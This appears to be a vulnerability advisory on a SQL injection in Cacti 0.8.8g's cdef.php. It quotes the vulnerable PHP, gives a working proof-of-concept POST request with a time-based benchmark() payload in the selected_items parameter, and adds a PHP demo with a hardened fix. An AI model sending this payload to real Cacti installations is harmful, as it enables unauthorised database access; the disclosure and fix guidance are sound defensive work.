Cacti 0.8.8g cdef.php selected_items SQL injection

The problem is in the form_actions() function in cdef.php. The selected_items POST parameter is unserialized and, in the delete branch (drp_action=1), passed straight into array_to_sql_or() with no validation at all. Compare the duplicate branch (drp_action=2), which runs every item through input_validate_input_number() before using it. stripslashes() also removes any magic-quotes escaping, so a single quote inside an item reaches the query builder intact.

function form_actions() {
    global $colors, $cdef_actions;

    /* if we are to save this form, instead of display it */
    if (isset($_POST["selected_items"])) {
        /* attacker-controlled array: unserialized, magic-quotes escaping removed */
        $selected_items = unserialize(stripslashes($_POST["selected_items"]));

        if ($_POST["drp_action"] == "1") { /* delete */
            /* no validation: each item is concatenated into the IN() list */
            db_execute("delete from cdef where " . array_to_sql_or($selected_items, "id"));
            db_execute("delete from cdef_items where " . array_to_sql_or($selected_items, "cdef_id"));

        }elseif ($_POST["drp_action"] == "2") { /* duplicate */
            for ($i=0;($i<count($selected_items));$i++) {
                /* ================= input validation ================= */
                /* this branch does validate; the delete branch above does not */
                input_validate_input_number($selected_items[$i]);
                /* ==================================================== */

                duplicate_cdef($selected_items[$i], $_POST["title_format"]);
            }
        }

        header("Location: cdef.php");
        exit;
    }
}

Following array_to_sql_or() into lib/database.php: every element is wrapped in single quotes but never escaped, so a quote inside an element closes the string literal and the rest of the element is appended to the query as raw SQL.

function array_to_sql_or($array, $sql_column) {
    /* if the last item is null; pop it off */
    if ((empty($array{count($array)-1})) && (sizeof($array) > 1)) {
        array_pop($array);
    }

    if (count($array) > 0) {
        $sql_or = "($sql_column IN(";

        for ($i=0;($i<count($array));$i++) {
            /* quoting is the only "protection"; nothing is escaped or cast */
            if (is_array($array[$i]) && array_key_exists($sql_column, $array[$i])) {
                $sql_or .= (($i == 0) ? "'":",'") . $array[$i][$sql_column] . "'";
            } else {
                $sql_or .= (($i == 0) ? "'":",'") . $array[$i] . "'";
            }
        }

        $sql_or .= "))";

        return $sql_or;
    }
}

Proof of concept request (an authenticated Cacti session is required, hence the Cacti cookie). The serialized array holds one string whose leading quote closes the literal, and benchmark() makes the server stall long enough to confirm the injection by the delay:

POST /cdef.php?action=actions HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: Cacti=fvb36noraocv8etfbrvokrle81
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

selected_items=a:1:{i:0;s:31:"',benchmark(10000000,sha1(1)),'";}&drp_action=1

What MySQL actually executes (shown for the second delete; the first, against cdef, is built the same way):

delete from cdef_items where (cdef_id IN('',benchmark(10000000,sha1(1)),''))
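The following is an added example, not code from Cacti: it reproduces the delete-branch query construction for the request above using a trimmed copy of array_to_sql_or(), then shows a hardened builder (named array_to_sql_or_ids here, a hypothetical name) that refuses anything except integer ids, which is what the cdef tables hold. The input string is constructed to match the POST body above.

```php
<?php
// Added example, not Cacti's own code. Reproduces how form_actions() turns the
// serialized selected_items value into SQL and contrasts it with an id-only builder.

// Trimmed copy of array_to_sql_or() from lib/database.php: every element is
// wrapped in quotes but never escaped. array_values() stands in for the
// original's 0..count-1 index loop.
function array_to_sql_or_vulnerable(array $array, string $sql_column): string {
    if (count($array) > 1 && empty($array[count($array) - 1])) {
        array_pop($array);
    }
    $sql_or = "($sql_column IN(";
    foreach (array_values($array) as $i => $item) {
        $value = (is_array($item) && array_key_exists($sql_column, $item))
            ? $item[$sql_column] : $item;
        $sql_or .= ($i == 0 ? "'" : ",'") . $value . "'";
    }
    return $sql_or . "))";
}

// Hardened builder (hypothetical, added here): ids are integers, so anything
// that is not a non-negative integer literal is rejected and the emitted
// values are bare integers, never interpolated strings.
function array_to_sql_or_ids(array $array, string $sql_column): string {
    $ids = [];
    foreach ($array as $item) {
        $value = (is_array($item) && array_key_exists($sql_column, $item))
            ? $item[$sql_column] : $item;
        if (!is_scalar($value) || !preg_match('/^[0-9]+$/', (string)$value)) {
            throw new InvalidArgumentException(
                "non-numeric id rejected: " . var_export($value, true));
        }
        $ids[] = (int)$value;
    }
    if ($ids === []) {
        throw new InvalidArgumentException("empty id list");
    }
    return "($sql_column IN(" . implode(',', $ids) . "))";
}

// Constructed input: the selected_items value from the request above, as PHP
// sees it after form decoding. stripslashes() mirrors form_actions().
$post_selected_items = 'a:1:{i:0;s:31:"\',benchmark(10000000,sha1(1)),\'";}';
$selected_items = unserialize(stripslashes($post_selected_items), ['allowed_classes' => false]);

echo "vulnerable: delete from cdef_items where "
    . array_to_sql_or_vulnerable($selected_items, 'cdef_id') . "\n";

try {
    echo "hardened:   delete from cdef_items where "
        . array_to_sql_or_ids($selected_items, 'cdef_id') . "\n";
} catch (InvalidArgumentException $e) {
    echo "hardened:   rejected (" . $e->getMessage() . ")\n";
}

// A legitimate selection (constructed: cdef ids 3 and 7) still works with the
// hardened builder.
$legit = unserialize('a:2:{i:0;s:1:"3";i:1;s:1:"7";}', ['allowed_classes' => false]);
echo "hardened:   delete from cdef_items where "
    . array_to_sql_or_ids($legit, 'cdef_id') . "\n";
```

Run with `php example.php`: the "vulnerable" line prints exactly the statement shown above, the hardened builder rejects the payload before any SQL is built, and the legitimate two-id selection produces a plain `IN(3,7)` list. Validating each item as a number the way the duplicate branch already does with input_validate_input_number() closes the same hole; a prepared statement with one placeholder per id is the other option.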
